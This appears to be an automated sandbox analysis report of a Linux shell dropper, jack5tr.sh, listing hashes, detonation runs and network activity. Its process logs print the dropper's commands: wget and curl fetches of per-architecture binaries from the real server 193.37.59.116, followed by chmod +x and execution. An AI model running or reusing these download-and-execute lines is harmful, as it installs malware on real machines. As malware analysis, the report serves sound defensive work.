Analysis Overview
SHA256
7c437f0cde14f1837f25bfcd49c486da5a1d6c749d55749ae1a5ab26ee4d4e7a
Threat Level: Shows suspicious behavior
The file jack5tr.sh was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
cURL User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-29 19:31
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
debian9-mipsbe-20240611-en
Max time kernel
34s
Max time network
35s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
180s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x config-err-iEKf7O jack5tr.sh netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN sh4 snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| GB | 89.187.167.5:443 | | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.98:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | daisy.ubuntu.com | udp |
Files
/tmp/x86
